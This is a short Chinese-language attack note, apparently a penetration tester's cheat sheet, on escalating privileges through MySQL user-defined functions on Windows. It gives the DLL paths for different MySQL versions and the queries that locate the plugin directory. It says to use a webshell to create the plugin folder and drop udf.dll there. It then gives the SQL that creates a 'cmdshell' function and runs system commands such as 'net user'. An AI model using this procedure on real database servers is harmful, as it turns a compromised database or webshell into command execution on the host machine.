C:\\WINDOWS\\udf.dll 或
C:\\WINDOWS\\system32\\udf.dll
等于mysql5.1版本
%mysql%\\plugin\\udf.dll 用 select
@@plugin_dir 查询plugin路径
SHOW VARIABLES LIKE '%plugin%'; 也可以查询plugin路径
默认 C:\\Program Files\\MySQL\\MySQL Server
5.1\\lib\\plugin\\udf.dll
该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建libplugin文件夹,然后将udf.dll文件导出到该目录即可。
select * from mysql.user; 判断是否有读的权限
有些提权shell需要导出udf之后,再执行下面的sql,
create function cmdshell returns string soname 'udf.dll' 创建函数
select cmdshell('net user') 执行命令